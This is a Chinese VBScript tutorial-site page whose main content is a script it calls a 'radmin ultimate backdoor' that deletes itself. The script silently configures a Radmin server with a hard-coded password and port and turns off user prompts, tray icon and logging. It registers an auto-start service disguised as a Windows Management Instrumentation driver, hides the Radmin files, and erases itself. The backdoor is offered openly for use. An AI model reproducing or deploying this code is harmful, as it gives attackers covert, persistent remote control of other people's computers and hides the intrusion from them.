当前位置: 首页 > 图文教程 > 脚本技术 > VBScript > Vbs脚本实现radmin终极后门代码_删除自身

VBScript
VBS中SendKeys的基本应用
VBScript教程 第十四课在VBScript中使用对象
VBScript教程 第十三课 VBScript与窗体
VBScript教程 第十二课VBScript页面的简单样例
VBScript教程 第十一课深入VBScript
VBScript教程 第十课 VBScript编码约定
VBScript教程 第九课VBScript过程
VBScript教程 第八课 使用循环语句
VBScript教程 第七课使用条件语句
VBScript教程 第六课VBScript运算符
VBscript教程 第五课 VBScript常数
VBScript教程 第四课VBScript变量
VBScript教程 第三课VBScript数据类型
VBScript教程 第二课在HTML页面中添加VBscript代码
VBScript教程 第一课什么是VBScript
VBScript的入门学习资料
VBScript语法速查及实例说明
MsgBox函数语言参考
VBS教程:正则表达式简介 -后向引用
VBS教程:正则表达式简介 -选择与编组

VBScript 中的 Vbs脚本实现radmin终极后门代码_删除自身


出处:互联网   整理: 软晨网(RuanChen.com)   发布: 2009-09-11   浏览: 67 ::
收藏到网摘: n/a


复制代码 代码如下:

on error resume next
const HKEY_LOCAL_MACHINE = &H80000002
strComputer = "."
Set StdOut = WScript.StdOut
Set oReg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &_
strComputer & "\root\default:StdRegProv")
strKeyPath = "SYSTEM\RAdmin"
oReg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
strKeyPath = "SYSTEM\RAdmin\v2.0"
oReg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
strKeyPath = "SYSTEM\RAdmin\v2.0\Server"
oReg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
strKeyPath = "SYSTEM\RAdmin\v2.0\Server\iplist"
oReg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
strKeyPath = "SYSTEM\RAdmin\v2.0\Server\Parameters"
oReg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
Set objRegistry = GetObject("Winmgmts:root\default:StdRegProv")
strPath = "SYSTEM\RAdmin\v2.0\Server\Parameters"
uBinary = Array(0,0,0,0)
Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"AskUser",uBinary)
uBinary = Array(0,0,0,0)
Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"AutoAllow",uBinary)
uBinary = Array(1,0,0,0)
Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"DisableTrayIcon",uBinary)
uBinary = Array(0,0,0,0)
Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"EnableEventLog",uBinary)
uBinary = Array(0,0,0,0)
Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"EnableLogFile",uBinary)
uBinary = Array(0,0,0,0)
Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"FilterIp",uBinary)
uBinary = Array(0,0,0,0)
Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"NTAuthEnabled",uBinary)
uBinary = Array(198,195,162,215,37,223,10,224,99,83,126,32,212,173,208,119) //此为注册表导出十六进制转为十进制数据 pass:241241241
Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"Parameter",uBinary) //Radmin密码
uBinary = Array(5,4,0,0) //端口:1029
Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"Port",uBinary)
uBinary = Array(10,0,0,0)
Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"Timeout",uBinary)
Set oReg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &strComputer &"\root\default:StdRegProv")
strKeyPath = "SYSTEM\RAdmin\v2.0\Server\Parameters"
strValueName = "LogFilePath"
strValue = "c:\logfile.txt"
set wshshell=createobject ("wscript.shell")
a=wshshell.run ("sc.exe create WinManageHelp binpath= %systemroot%\system32\Exporer.exe start= auto",0)
oReg.SetStringValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,strValue
Set oReg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &strComputer &"\root\default:StdRegProv")
strKeyPath = "SYSTEM\ControlSet001\Services\WinManageHelp"
strValueName = "Description"
strValue = "Windows Media PlayerWindows Management Instrumentation Player Drivers."
oReg.SetStringValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,strValue
strValueName = "DisplayName"
strValue = "Windows Management Instrumentation Player Drivers"
oReg.SetStringValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,strValue
strValueName = "ImagePath"
strValue = "c:\windows\system32\Exporer.exe /service"
oReg.SetExpandedStringValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,strValue
set wshshell=createobject ("wscript.shell")
a=wshshell.run ("net start WinManageHelp",0)
b=wshshell.run ("attrib +r +h +s %systemroot%\system32\exporer.exe",0)
c=wshshell.run ("attrib +r +h +s %systemroot%\system32\AdmDll.dll",0)
d=wshshell.run ("attrib +r +h +s %systemroot%\system32\raddrv.dll",0)
CreateObject("Scripting.FileSystemObject").DeleteFile(WScript.ScriptName) //自删除

最好的删除代码不错
createobject("scripting.filesystemobject").deletefile(script.scriptname)